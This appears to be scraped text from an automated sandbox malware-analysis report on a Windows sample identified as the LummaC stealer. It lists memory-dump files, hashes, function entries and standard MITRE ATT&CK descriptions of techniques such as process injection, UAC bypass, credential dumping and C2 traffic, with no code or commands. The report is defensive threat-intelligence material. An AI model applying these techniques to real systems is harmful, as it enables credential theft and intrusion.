Associated: 00000004.00000002.2500563125.0000000001080000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500587247.0000000001081000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500626663.00000000010C9000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500626663.00000000010D0000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500677195.00000000010DE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500702115.00000000010E0000.00000080.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e30000_ZXCELRXK9FXBC48TJDYH4AM8OTM.jbxd

Similarity

API ID:
String ID: Z~z
API String ID: 0-4220548104
Opcode ID: fdb22c5d66c050500ebe0cd6f0b4e3e286b303ddb66929ad1c441622f0e5f80d
Instruction ID: 0e6cb47534d62d441f5e0230ec207a96db760b40d01a2aa1fa7e66de25864383
Opcode Fuzzy Hash: fdb22c5d66c050500ebe0cd6f0b4e3e286b303ddb66929ad1c441622f0e5f80d
Instruction Fuzzy Hash: 6151E0F361C3049FE708AE29EC8677ABBE9EB94310F16893DE6C0C7384E9355445865B

Function 00FAFFE0 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499817397.0000000000FAC000.00000040.00000001.01000000.00000006.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000004.00000002.2499577326.0000000000E30000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499601402.0000000000E32000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499622986.0000000000E36000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499645120.0000000000E3A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499666484.0000000000E46000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499769729.0000000000F97000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499791416.0000000000F99000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499817397.0000000000FB9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499869034.0000000000FD3000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499888723.0000000000FD4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499909568.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499929421.0000000000FD7000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499955459.0000000000FED000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499978714.0000000000FEE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500000700.0000000000FF5000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500021434.0000000001002000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500045417.000000000100F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500070143.0000000001016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500092234.0000000001017000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500119525.0000000001018000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500143576.0000000001019000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500165950.000000000101A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500189364.0000000001025000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500214005.0000000001026000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500240117.0000000001027000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500263913.000000000102E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500286419.0000000001039000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500308170.0000000001041000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500327685.0000000001042000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500353961.0000000001044000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500376629.0000000001052000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500399793.0000000001053000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500419986.0000000001054000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500443491.000000000105B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500468625.0000000001062000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500489288.0000000001064000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500511782.0000000001065000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500536578.000000000106D000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500563125.0000000001080000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500587247.0000000001081000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500626663.00000000010C9000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500626663.00000000010D0000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500677195.00000000010DE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500702115.00000000010E0000.00000080.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e30000_ZXCELRXK9FXBC48TJDYH4AM8OTM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b7310ffa2a3cc1bccbc131fe95edb67ce376f9d9e5a55ec0a10bff4c3f01dca
Instruction ID: 3bf2197dcf9e5f317ade7267e1b0d7a922f34f26d4f92438b48516b57ff41020
Opcode Fuzzy Hash: 6b7310ffa2a3cc1bccbc131fe95edb67ce376f9d9e5a55ec0a10bff4c3f01dca
Instruction Fuzzy Hash: C741ACB280C7049FE711BF29DC8166AFBE0FF59310F1A4A2DDAD487210E6359850DB83

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe.log

C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
file.exe

Function 00FAF0F0 Relevance: 1.6, APIs: 1, Instructions: 137
libraryCOMMON

Function 00FBCB2E Relevance: 4.6, APIs: 3, Instructions: 75
registryCOMMON

Function 00FAF246 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 146
libraryCOMMON

Function 00FB37BA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63
fileCOMMON

Function 00FB3623 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57
fileCOMMON

Function 054B0D42 Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Function 054B0D48 Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Function 054B1509 Relevance: 1.6, APIs: 1, Instructions: 54
serviceCOMMON

Function 054B1510 Relevance: 1.6, APIs: 1, Instructions: 54
serviceCOMMON

Function 054B1301 Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Function 054B1308 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Function 00FB363D Relevance: 1.5, APIs: 1, Instructions: 39
fileCOMMON

Function 00FB3628 Relevance: 1.5, APIs: 1, Instructions: 37
fileCOMMON

Function 00FB3658 Relevance: 1.5, APIs: 1, Instructions: 33
fileCOMMON

Function 00FB38A0 Relevance: 1.5, APIs: 1, Instructions: 31
fileCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre